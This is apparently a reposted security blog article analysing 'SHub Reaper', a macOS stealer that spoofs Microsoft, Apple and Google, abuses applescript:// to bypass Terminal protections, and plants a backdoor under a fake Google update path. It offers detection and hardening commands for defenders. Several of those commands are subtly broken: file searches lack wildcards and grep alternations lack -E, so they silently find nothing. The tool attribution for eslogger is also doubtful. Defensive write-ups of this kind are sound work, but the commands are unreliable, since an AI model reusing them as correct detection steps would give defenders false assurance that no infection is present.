SHub Reaper: The Multi‑Brand macOS Stealer That Bypasses Tahoe’s Terminal Protections + Video

Listen to this Post

Featured Image

Introduction:

A newly emerged macOS information stealer, dubbed SHub Reaper, is raising the bar for multi‑stage infection chains. Unlike its predecessors that relied on basic “ClickFix” tricks, Reaper seamlessly impersonates Apple, Google, and Microsoft within a single attack—and does so without ever opening Terminal, effectively sidestepping Apple’s macOS Tahoe 26.4 mitigations. This article dissects Reaper’s technical anatomy, provides hands‑on detection commands for macOS defenders, and outlines actionable mitigation strategies.

Learning Objectives:

  • Understand how SHub Reaper chains three distinct brand spoofs (Microsoft, Apple, Google) in one attack flow.
  • Analyze the evasion techniques that bypass Terminal‑based protections and abuse native macOS tools like AppleScript and the `applescript://` scheme.
  • Implement detection and hardening measures using macOS native commands and endpoint detection rules.

You Should Know

1. The Three‑Stage Disguise Chain

SHub Reaper’s infection chain is a masterclass in social engineering. Each phase impersonates a different trusted brand, making the overall attack highly deceptive.

  • Stage 1 – Microsoft (Delivery): Victims are lured with fake WeChat or Miro installers hosted on a typo‑squatted Microsoft domain (e.g., micros0ft‑secure[.]com). This initial payload is often a signed disk image (.dmg) that triggers the next stage.
  • Stage 2 – Apple (Execution): Instead of pasting commands into Terminal, Reaper abuses the `applescript://` URL scheme. When a user clicks “Run” in Script Editor, the malware presents a convincing Apple XProtectRemediator “Security Update” window while executing hidden AppleScript commands in the background. Padded with fake installer text and ASCII art, the malicious code remains invisible to the casual user.
  • Stage 3 – Google (Persistence): After stealing credentials and wallet data, Reaper installs a persistent backdoor hidden inside a directory that mimics Google Software Update (e.g., /Library/Google/GoogleSoftwareUpdate/...). This adds longevity and makes removal harder for users who only check standard locations.

Step‑by‑step guide (detection & investigation):

  1. Monitor for `applescript://` URL invocations – Check system logs for unexpected Script Editor launches:
    log show --predicate 'eventMessage contains "applescript://"' --last 1h
    
  2. List recently downloaded `.dmg` files from suspicious domains:
    find ~/Downloads -name ".dmg" -exec shasum -a 256 {} \;
    
  3. Inspect running AppleScript processes for obfuscated or lengthy scripts:
    ps aux | grep -i "osascript|applescript"
    
  4. Enumerate persistence directories associated with Google, Microsoft, or Apple spoofing:
    ls -la /Library/Google/ /Library/Application\ Support/Microsoft/ /Library/Apple/
    

2. Bypassing Tahoe’s Terminal Mitigations Using `applescript://`

Apple’s macOS Tahoe 26.4 introduced enhanced protections against terminal‑based social engineering (e.g., warnings when copying‑and‑pasting commands into Terminal). SHub Reaper evades these safeguards by abusing the `applescript://` URL scheme, which launches Script Editor directly, bypassing Terminal entirely.

Once Script Editor is open, the malware displays a fake “Run” prompt that looks like a legitimate system update. Behind the scenes, it executes a malicious AppleScript that:

  • Asks for the user’s macOS password (via a system‑like dialog).
  • Downloads and runs a second‑stage payload (the actual stealer and backdoor).
  • Uses padded content and ASCII art to visually hide the malicious commands below the visible scroll area.

Step‑by‑step guide (emulating & detecting this technique):

1. Simulate (for testing only – isolated VM):

Create a harmless script that logs execution:

do shell script "echo '$(date) - applescript:// executed' >> /tmp/test.log"

Save it as a `.scpt` file and trigger via open -a "Script Editor" malicious.scpt.

2. Detect abuse of `applescript://` in system logs:

log show --predicate 'eventMessage contains "applescript://"' --info --last 6h | grep -v "com.apple"
  1. Monitor for Script Editor launched from non‑standard parent processes:
    sudo eslogger exec | grep -i "Script Editor"
    

    (Requires Endpoint Security framework; `eslogger` is part of Santa or custom tooling.)

  2. Check for suspicious AppleScript files that are obfuscated or contain long strings:

    find / -name ".scpt" -o -name ".applescript" 2>/dev/null | xargs -I {} sh -c "echo {}; strings {} | head -20"
    

3. Credential & Crypto Theft with AMOS‑Style Filegrabber

SHub Reaper extends beyond traditional cookie and password stealing. According to SentinelOne, this variant includes an AMOS‑style Filegrabber and chunked uploads, enabling attackers to exfiltrate documents, desktop files, and developer artifacts. Targeted applications include:

  • Browsers: Chrome, Firefox, Brave, Edge, Opera, Vivaldi, Arc, Orion
  • Wallets: Exodus, Atomic Wallet, Ledger Live, Electrum, Trezor Suite
  • Password managers: 1Password, Bitwarden, LastPass
  • System data: macOS Keychain, Telegram sessions, browser extensions, crypto wallet extensions (MetaMask, Phantom)

Detection commands (run on a clean system for baseline):

  • Check for unauthorized Keychain access:
    log show --predicate 'process == "securityd" AND eventMessage contains "Keychain" AND eventMessage contains "copy"' --last 1h
    

  • List all browser credential databases accessed recently:

    find ~/Library -name "Login Data" -o -name "Cookies" -o -name ".sqlite" | xargs ls -la
    

  • Monitor outbound connections to unusual domains (typical exfiltration ports 443, 8443):

    sudo lsof -i -n -P | grep ESTABLISHED | grep -v "apple|google|microsoft"
    

4. Network‑Based Evasion & Anti‑Analysis

Before delivering the payload, the malware’s landing pages perform extensive fingerprinting. Scripts collect:

  • WebGL data, VPN indicators, browser extensions, and VM artifacts
  • Presence of security research tools (e.g., Wireshark, Frida, Hopper)
  • Debugger detection (e.g., intercepting F12, infinite debugger loops)

If analysis is suspected, the page may redirect to a Russian‑language “Access Denied” message or simply show a blank screen, making automated sandbox analysis difficult.

Defender checklist:

  • Use dynamic analysis with TTPs that emulate user interaction (e.g., Selenium with stealth plugins).
  • Block known malicious domains via DNS sinkhole or firewall. Extract IOCs from SentinelOne’s report (e.g., typo‑squatted Microsoft domains, specific `applescript://` URIs).
  • For enterprise, deploy endpoint rules that alert on Script Editor execution from non‑interactive contexts or from unsigned `.scpt` files.

5. Persistence & Backdoor Capabilities

Reaper’s final stage installs a persistent backdoor that provides operators with ongoing access. The backdoor is hidden in paths that impersonate Google’s legitimate update directories, such as:

/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/GoogleSoftwareUpdate

However, in this case, the binary is malicious and communicates with a C2 server. The backdoor can:

  • Download and execute additional payloads
  • Steal data on an ongoing basis
  • Pivot to other hosts on the same network

Step‑by‑step guide to detect such persistence:

  1. Check launch daemons and agents for fake Google/Microsoft paths:
    ls -la /Library/LaunchDaemons/ /Library/LaunchAgents/ ~/Library/LaunchAgents/
    grep -r "GoogleSoftwareUpdate|Microsoft" /Library/LaunchDaemons/ /Library/LaunchAgents/ ~/Library/LaunchAgents/
    

2. Verify code signatures of Google/Microsoft binaries:

codesign -dvvv /Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/GoogleSoftwareUpdate

(Legitimate binaries should be signed by “Google Inc.” or “Microsoft Corporation”.)

  1. Monitor for unusual network connections from processes in spoofed directories:
    sudo lsof -i -n -P | grep -E "/Library/Google|/Library/Microsoft"
    

What Undercode Say

  • Key Takeaway 1 – Evasion keeps evolving: SHub Reaper proves that macOS attackers are shifting away from terminal‑based commands to `applescript://` and other native macOS frameworks, effectively bypassing security features introduced in Tahoe. Defenders must expand visibility beyond Terminal logging.
  • Key Takeaway 2 – Multi‑brand spoofing is a powerful social engineering tactic: Using three different trusted brands (Microsoft for delivery, Apple for execution, Google for persistence) within one attack chain makes it much harder for users to recognize a single “tell.” Security awareness training should now cover multi‑stage impersonation scenarios, not just fake login pages.

Analysis:

The sophistication of SHub Reaper indicates that macOS is no longer a “safe” haven. Criminal operators are investing in platform‑specific tradecraft, borrowing techniques from Windows (e.g., living‑off‑the‑land, fileless execution) and adapting them to macOS. The use of the `applescript://` scheme is particularly concerning because AppleScript has deep system access and is often trusted by endpoint detection tools. Additionally, the inclusion of a persistent backdoor (not just one‑time data theft) suggests that attackers are interested in long‑term access for targeted extortion or corporate espionage. Enterprises with mixed macOS/Windows environments must unify detection across both platforms, focusing on behavioral patterns (e.g., unusual AppleScript executions, credential access from non‑standard processes) rather than simple signature matches.

Prediction

In the next 6–12 months, we will likely see a surge of macOS malware that completely avoids Terminal by abusing other native URL schemes (x-apple.systempreferences:, open -b, etc.) and scripting environments (JavaScript for Automation, Python). Apple may be forced to introduce execution prompts for `applescript://` similar to Terminal’s “paste warning.” Meanwhile, attackers will double down on brand spoofing, possibly mimicking Amazon Web Services (AWS) or Zoom to target specific verticals. Defenders should prepare for a new class of “scheme‑based” infection vectors and update their endpoint monitoring accordingly.

▶️ Related Video (86% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Jamie Williams – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky